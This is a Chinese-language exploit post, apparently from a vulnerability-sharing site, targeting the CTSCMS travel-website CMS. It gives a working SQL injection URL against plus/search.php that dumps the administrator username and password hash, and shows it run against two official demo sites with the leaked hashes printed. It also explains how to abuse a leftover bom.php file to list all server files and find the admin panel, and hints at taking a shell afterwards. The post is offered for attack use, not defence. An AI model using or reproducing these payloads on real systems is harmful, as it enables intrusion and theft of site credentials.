CTSCMS 最新漏洞

中国旅游服务网站管理系统(CTSCMS.COM)是专业的旅游网站程序源码、旅游网站系统、旅游网站模板、旅游网站建设服务提供商,专注于旅游电子商务发展的服务于旅行社和旅游。。。

好吧~CTSCMS 其实就是使用织梦的模版,然后就是自己的商业版了~居然还有出500大洋去购买的

查看更新日期
data/admin/ver.txt
一般都是2010年的,或许还可以直接getshell

exp:
[php]http://www.0day5.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a[/php]

默认后台地址是
http://www.0day5.com/ctscms

找不到后台的也好办,在查看源码的时候发现一个有趣的东西
bom.php
[php]
//remove the utf-8 boms
//by magicbug at gmail dot com

if (isset($_GET['dir'])){ //config the basedir
$basedir=$_GET['dir'];
}else{
$basedir = '.';
}

$auto = 1;

checkdir($basedir);

function checkdir($basedir){
if ($dh = opendir($basedir)) {
while (($file = readdir($dh)) !== false) {
if ($file != '.' && $file != '..'){
if (!is_dir($basedir."/".$file)) {
echo "filename: $basedir/$file ";
echo checkBOM("$basedir/$file")."
";
}else{
$dirname = $basedir."/".$file;
checkdir($dirname);
}
}
}
closedir($dh);
}
}

function checkBOM ($filename) {
global $auto;
$contents = file_get_contents($filename);
$charset[1] = substr($contents, 0, 1);
$charset[2] = substr($contents, 1, 1);
$charset[3] = substr($contents, 2, 1);
if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) {
if ($auto == 1) {
$rest = substr($contents, 3);
rewrite ($filename, $rest);
return ("BOM found, automatically removed.");
} else {
return ("BOM found.");
}
}
else return ("BOM Not Found.");
}

function rewrite ($filename, $data) {
$filenum = fopen($filename, "w");
flock($filenum, LOCK_EX);
fwrite($filenum, $data);
fclose($filenum);
}
?>
[/php]
可以列出全部文件,嘿嘿~然后你懂的,找不到的时候就实时
http://www.0day5.com/bom.php

后台就直接查找sys_safe.php就可以找到后台了~

官方演示版:
[php]http://c.ctscms.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a[/php]

Error infos: Duplicate entry '1|ctscms|d7f10e7cca0693eb8561' for key 'group_key'

[php]http://s.ctscms.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a[/php]

Error infos: Duplicate entry '1|ctscms|c6364c485d55bb9df83a' for key 'group_key'

后台拿shell就不解释了~

发表评论